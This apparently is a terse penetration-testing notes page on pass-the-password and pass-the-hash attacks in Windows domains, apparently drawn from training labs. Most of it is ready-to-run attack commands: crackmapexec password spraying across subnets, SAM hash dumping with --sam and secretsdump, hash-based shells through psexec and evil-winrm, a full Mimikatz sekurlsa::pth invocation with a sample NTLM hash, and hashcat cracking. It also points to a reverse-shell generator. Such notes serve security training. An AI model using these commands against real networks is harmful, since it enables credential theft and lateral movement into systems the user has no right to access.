Pass the Password or Pass the Hash
crackmapexec
Then can use
crackmapexec smb 192.168.161.0/24 -u <user> -d MARVEL.local -p <Password>to try the password with other machines
Use --sam to dump SAM hashes
Can then use psexec to get a shell with
crackmapexec smb 172.16.1.0/24 -u Administrator -d . -H 30B3783CE2ABF1AF70F77D0660CF3453try--local-authtoo
secretsdump.py
to dump info like SAM
We can pass these hashes and try to pwn the other machines on the network
Save that SAM hashes in a text file
Mimikatz
/user - The user name we want to impersonate.
/rc4 or /NTLM - NTLM hash of the user's password.
/domain - Domain the user to impersonate belongs to. In the case of a local user account, we can use the computer name, localhost, or a dot (.).
/run - The program we want to run with the user's context (if not specified, it will launch cmd.exe).
mimikatz.exe privilege::debug "sekurlsa::pth /user:julio /rc4:64F12CDDAA88057E06A81B54E73B949B /domain:inlanefreight.htb /run:cmd.exe" exit
Target - Hostname or IP address of the target.
Username - Username to use for authentication.
Domain - Domain to use for authentication. This parameter is unnecessary with local accounts or when using the @domain after the username.
Hash - NTLM password hash for authentication. This function will accept either LM:NTLM or NTLM format.
Command - Command to execute on the target. If a command is not specified, the function will check to see if the username and hash have access to WMI on the target.
can also get reverse shell. Refer https://www.revshells.com/
Imapcket psexec
Evil-winrm
RDP
Allow pth
To connect
Cracking with hashcat
NOTE: _Can only pass around NTLM hashes not NTLMv2_ use -m 1000 to crack with hashcat
Pass the Hash
Only the second half of the hash is required
to pass the hash To get a shell we can use psexec:
Last updated
Was this helpful?